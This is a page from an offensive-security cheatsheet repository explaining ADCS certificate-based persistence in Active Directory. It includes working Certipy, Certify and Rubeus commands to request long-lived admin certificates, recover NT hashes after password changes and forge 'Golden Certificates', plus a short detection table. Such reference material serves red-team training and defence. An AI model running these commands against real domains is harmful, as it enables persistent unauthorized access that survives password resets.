daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-67-adcs-certificate-based-persistence.md (3486B)


      1 ---
      2 title: "Attack #67 β€” ADCS Certificate-Based Persistence"
      3 description: "An attacker who has compromised a DA account can request a long-lived client authentication certificate for that account. Even after the DA password is…"
      4 category: active-directory
      5 subcategory: "Persistence"
      6 tags: ["active-directory", "adcs", "persistence", "hashing"]
      7 tools: ["Rubeus", "Certipy", "Certify", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/🟀 Attack #67 β€” ADCS Certificate-Based Persistence.md"
     11 ---
     12 # 🟀 Attack #67 β€” ADCS Certificate-Based Persistence
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 An attacker who has compromised a DA account can **request a long-lived client authentication certificate** for that account. Even after the DA password is changed, the certificate remains valid for authentication via PKINIT β€” typically for 1 year or more. Combined with **Golden Certificate (#35)** (stealing the CA private key to forge unlimited certs), ADCS persistence is the strongest persistence mechanism in AD.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **DA or target user credentials** | To request a certificate |
     27 | **ADCS deployed** | With Client Authentication templates available |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```bash
     34 # ── Request a long-lived cert as Administrator ────────────────────────────────
     35 certipy req -u Administrator@corp.local -p 'Password1' -ca CORP-CA \
     36   -template User -dc-ip 10.10.10.10
     37 # Output: administrator.pfx (valid for template's configured lifetime, default 1 year)
     38 
     39 # ── Use cert after password change (months later) ────────────────────────────
     40 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     41 # Returns current NT hash β€” even though password was changed
     42 
     43 # ── Golden Certificate (ultimate persistence β€” Attack #35) ───────────────────
     44 # Forge unlimited certificates using stolen CA key:
     45 certipy forge -ca-pfx CORP-CA.pfx -upn Administrator@corp.local -subject "CN=Administrator"
     46 certipy auth -pfx forged_administrator.pfx -dc-ip 10.10.10.10
     47 ```
     48 
     49 ```powershell
     50 # ── Certify (Windows) ─────────────────────────────────────────────────────────
     51 .\Certify.exe request /ca:CORP-CA /template:User
     52 # Convert PEM to PFX, then use Rubeus for PKINIT:
     53 .\Rubeus.exe asktgt /user:Administrator /certificate:admin.pfx /password:pass /ptt
     54 ```
     55 
     56 ***
     57 
     58 ## πŸ›‘οΈ Detection β€” Event IDs
     59 
     60 | Event ID | Source | What to Look For |
     61 |---|---|---|
     62 | **4886** | Security Log (CA) | Certificate enrollment by admin account |
     63 | **4768** | Security Log (DC) | PKINIT authentication β€” smart card logon for non-smart-card user |
     64 
     65 ***
     66 
     67 ## πŸ”— Attack Chain Context
     68 
     69 ```
     70 [ADCS Persistence] ──→ Long-lived certificates survive password changes
     71          β”‚
     72          β”œβ”€β”€β†’ πŸ”’ Cert valid 1+ year β€” outlasts password rotation policies
     73          β”œβ”€β”€β†’ πŸ’€ Golden Certificate: forge unlimited certs = permanent access
     74          └──→ πŸ’€ Defeated by: short cert lifetimes, CA key protection, cert revocation
     75 ```
     76 
     77 ***
     78 
     79 > βœ… **Attack #67 β€” ADCS Certificate-Based Persistence complete.**
     80 
     81 ***
     82 
     83 > 🏁 **Category 8 β€” Persistence Techniques is now COMPLETE (7/7 attacks).**